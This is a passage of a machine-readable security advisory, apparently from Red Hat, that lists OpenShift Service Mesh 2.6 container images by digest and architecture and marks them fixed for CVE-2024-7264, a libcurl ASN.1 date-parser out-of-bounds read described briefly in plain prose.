"name": "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x"
},
"product_reference": "openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64"
},
"product_reference": "openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le"
},
"product_reference": "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64"
},
"product_reference": "openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x"
},
"product_reference": "openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64"
},
"product_reference": "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64"
},
"product_reference": "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x"
},
"product_reference": "openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le"
},
"product_reference": "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le"
},
"product_reference": "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64"
},
"product_reference": "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64 as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x as a component of RHOSSM 2.6 for RHEL 8",
"product_id": "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x"
},
"product_reference": "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"relates_to_product_reference": "8Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le as a component of RHOSSM 2.6 for RHEL 9",
"product_id": "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"relates_to_product_reference": "9Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64 as a component of RHOSSM 2.6 for RHEL 9",
"product_id": "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"relates_to_product_reference": "9Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x as a component of RHOSSM 2.6 for RHEL 9",
"product_id": "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"relates_to_product_reference": "9Base-RHOSSM-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64 as a component of RHOSSM 2.6 for RHEL 9",
"product_id": "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
},
"product_reference": "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64",
"relates_to_product_reference": "9Base-RHOSSM-2.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-7264",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2024-07-31T04:33:09+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2301888"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libcurl, where libcurl\u0027s ASN1 parser code has the `GTime2str()` function, used for parsing an ASN.1 Generalized Time field. If a syntactically incorrect field is given, the parser can use -1 for the length of the *time fraction*, leading to a `strlen()` performed on a pointer to a heap buffer area that is not purposely NULL terminated.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "curl: libcurl: ASN.1 date parser overread",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
